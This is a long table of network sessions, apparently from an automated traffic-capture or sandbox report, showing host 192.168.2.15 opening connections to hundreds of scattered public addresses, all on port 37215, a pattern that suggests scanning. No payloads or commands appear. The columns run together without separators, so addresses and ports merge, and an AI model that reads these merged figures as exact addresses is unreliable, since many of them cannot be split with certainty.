                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28218192.168.2.153871894.22.13.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28219192.168.2.153814094.254.121.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28220192.168.2.1539084157.254.27.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28221192.168.2.1544644156.177.42.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28222192.168.2.1554712122.127.64.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28223192.168.2.154058041.114.39.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28224192.168.2.1559364121.180.123.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28225192.168.2.154375237.178.65.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28226192.168.2.153361441.70.190.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28227192.168.2.1555718181.229.34.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28228192.168.2.1547370186.146.66.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28229192.168.2.153923441.53.85.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28230192.168.2.1552496190.248.37.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28231192.168.2.1557840102.206.208.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28232192.168.2.1554206181.133.152.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28233192.168.2.1546954157.230.40.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28234192.168.2.1537756157.101.56.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28235192.168.2.1547640157.95.174.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28236192.168.2.1545128102.247.5.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28237192.168.2.154687645.217.83.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28238192.168.2.154038037.109.126.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28239192.168.2.1556294102.225.16.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28240192.168.2.1550774181.241.82.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28241192.168.2.1549642197.113.201.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28242192.168.2.155166245.93.139.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28243192.168.2.1553054184.55.227.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28244192.168.2.1556996186.24.38.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28245192.168.2.1536418156.214.74.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28246192.168.2.1534560122.12.147.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28247192.168.2.155104841.228.232.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28248192.168.2.1554838222.148.144.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28249192.168.2.1558460222.10.12.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28250192.168.2.153368445.17.184.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28251192.168.2.1552474138.243.236.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28252192.168.2.1560608222.212.235.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28253192.168.2.1543094114.144.149.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28254192.168.2.1540304181.205.130.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28255192.168.2.155562831.63.166.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28256192.168.2.1541412186.84.115.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28257192.168.2.1548760138.135.54.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28258192.168.2.155968837.161.178.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28259192.168.2.155502245.195.173.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28260192.168.2.154751031.192.101.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28261192.168.2.1553880181.6.100.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28262192.168.2.1546042157.169.48.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28263192.168.2.1549200190.240.41.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28264192.168.2.1547716102.197.155.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28265192.168.2.155981637.46.247.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28266192.168.2.1546014222.72.95.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28267192.168.2.1538116138.153.202.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28268192.168.2.1546320102.210.184.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28269192.168.2.1551672181.173.26.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28270192.168.2.154043837.81.20.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28271192.168.2.1551774122.248.252.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28272192.168.2.1539734190.20.244.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28273192.168.2.1535094190.236.168.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28274192.168.2.1536378197.84.57.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28275192.168.2.1555372222.225.166.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28276192.168.2.1545330190.94.102.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28277192.168.2.1536158186.175.79.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28278192.168.2.1559694138.67.61.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28279192.168.2.1548876156.88.153.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28280192.168.2.1550012102.218.217.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28281192.168.2.1539552190.43.228.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28282192.168.2.155575241.206.122.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28283192.168.2.1558744186.130.76.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28284192.168.2.1546870122.164.102.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28285192.168.2.1554614138.31.141.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28286192.168.2.1559390143.88.184.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28287192.168.2.155144031.44.111.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28288192.168.2.1545852190.135.14.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28289192.168.2.155443241.167.183.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28290192.168.2.155612494.80.60.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28291192.168.2.155046272.46.244.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28292192.168.2.1549596157.125.14.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28293192.168.2.1555458186.153.141.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28294192.168.2.154154231.101.174.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28295192.168.2.1533630181.208.15.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28296192.168.2.154033431.99.215.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28297192.168.2.153753849.201.243.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28298192.168.2.155223241.62.180.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28299192.168.2.1533618138.130.24.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28300192.168.2.1542402138.94.14.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28301192.168.2.1557568222.45.177.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28302192.168.2.1546824156.21.59.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28303192.168.2.1557566102.155.34.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28304192.168.2.155593631.13.130.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28305192.168.2.1547548102.5.189.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28306192.168.2.1537396122.144.14.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28307192.168.2.1551966181.249.1.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28308192.168.2.1536404181.220.147.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28309192.168.2.1549506138.71.41.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28310192.168.2.1548152157.149.106.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28311192.168.2.154135094.75.119.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28312192.168.2.1538946197.255.139.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28313192.168.2.1534608138.61.110.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28314192.168.2.1532972186.48.90.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28315192.168.2.153495431.153.153.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28316192.168.2.153614037.3.206.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28317192.168.2.1539096181.167.69.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28318192.168.2.1551690197.247.141.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28319192.168.2.1532864122.174.148.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28320192.168.2.1538598102.42.194.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28321192.168.2.154728041.68.62.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28322192.168.2.153380837.8.53.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28323192.168.2.155410494.18.253.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28324192.168.2.1558272122.70.184.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28325192.168.2.1544310197.184.215.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28326192.168.2.1535024222.111.199.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28327192.168.2.153723231.151.29.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28328192.168.2.1552742156.12.157.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28329192.168.2.1556844181.46.106.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28330192.168.2.1536626181.128.160.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28331192.168.2.1559986157.47.129.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28332192.168.2.1537172138.38.85.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28333192.168.2.1546462197.73.56.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28334192.168.2.1536450157.114.191.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28335192.168.2.154448437.234.38.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28336192.168.2.155714441.214.192.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28337192.168.2.1548128222.255.143.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28338192.168.2.1541872186.239.145.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28339192.168.2.1538728181.106.123.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28340192.168.2.154016041.158.17.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28341192.168.2.1542140102.136.57.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28342192.168.2.1540700138.229.117.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28343192.168.2.1553358197.122.141.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28344192.168.2.1538068190.207.116.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28345192.168.2.1538240157.83.80.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28346192.168.2.1555218137.163.140.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28347192.168.2.1545678138.169.208.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28348192.168.2.153871045.36.255.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28349192.168.2.154400694.122.222.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28350192.168.2.155433641.35.180.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28351192.168.2.1538984186.12.224.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28352192.168.2.1541894200.173.242.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28353192.168.2.1542670190.92.149.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28354192.168.2.153551231.173.224.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28355192.168.2.1551908156.24.116.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28356192.168.2.154572431.186.15.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28357192.168.2.154997445.165.13.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28358192.168.2.1555060121.208.2.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28359192.168.2.1553376156.109.212.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28360192.168.2.1542910181.82.52.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28361192.168.2.154801237.92.84.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28362192.168.2.154342837.87.98.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28363192.168.2.1546928190.89.182.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28364192.168.2.1535876122.154.208.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28365192.168.2.1549068157.84.35.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28366192.168.2.1545424181.46.59.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28367192.168.2.1555570112.23.107.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28368192.168.2.1551424181.29.184.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28369192.168.2.1551272156.1.77.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28370192.168.2.1543966122.187.250.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28371192.168.2.1538988121.104.13.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28372192.168.2.153861245.12.62.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28373192.168.2.1558848157.128.240.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28374192.168.2.153548237.6.102.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28375192.168.2.154964645.101.30.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28376192.168.2.154112045.102.132.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28377192.168.2.156064094.33.122.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28378192.168.2.1556756102.140.73.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28379192.168.2.1551738138.153.36.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28380192.168.2.155019676.206.2.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28381192.168.2.1541858138.242.178.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28382192.168.2.1557386222.162.237.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28383192.168.2.155860645.145.208.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28384192.168.2.1543986222.114.226.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28385192.168.2.1549528138.9.21.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28386192.168.2.155600237.138.171.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28387192.168.2.1553910121.89.195.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28388192.168.2.1539072102.65.64.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28389192.168.2.1553338222.209.107.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28390192.168.2.155481431.188.107.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28391192.168.2.154429045.93.224.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28392192.168.2.155067437.161.104.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28393192.168.2.1553084121.194.189.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28394192.168.2.1557156186.218.126.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28395192.168.2.1538008190.10.173.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28396192.168.2.1538152197.6.240.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28397192.168.2.1558640222.153.57.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28398192.168.2.1537334181.147.30.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28399192.168.2.1550410102.44.242.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28400192.168.2.1541294122.227.217.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28401192.168.2.1542434121.218.136.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28402192.168.2.1555608181.209.168.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28403192.168.2.1554950121.2.208.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28404192.168.2.1559960138.38.80.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28405192.168.2.153639245.80.140.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28406192.168.2.153397637.194.237.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28407192.168.2.154926231.163.16.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28408192.168.2.1535226122.180.250.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28409192.168.2.154683894.103.173.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28410192.168.2.1555070157.74.114.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28411192.168.2.1553088113.19.240.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28412192.168.2.1545378122.55.150.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28413192.168.2.1543596222.133.220.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28414192.168.2.1550248156.251.194.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28415192.168.2.1546654181.193.56.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28416192.168.2.155360837.223.25.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28417192.168.2.1557018157.45.56.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28418192.168.2.153861041.20.118.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28419192.168.2.1544250102.113.97.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28420192.168.2.1540808138.40.110.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28421192.168.2.1542264138.68.223.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28422192.168.2.1550596121.253.172.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28423192.168.2.1536776102.208.247.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28424192.168.2.1545056102.197.132.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28425192.168.2.154321041.12.192.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28426192.168.2.1560732222.144.250.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28427192.168.2.1542418138.40.164.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28428192.168.2.1552038181.169.212.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28429192.168.2.1549260121.54.34.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28430192.168.2.1545936122.138.189.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28431192.168.2.154599694.25.50.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28432192.168.2.1533086122.177.108.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28433192.168.2.1553192102.222.26.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28434192.168.2.1560476156.252.30.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28435192.168.2.154525831.52.213.12137215
                                              TimestampBytes transferredDirectionData


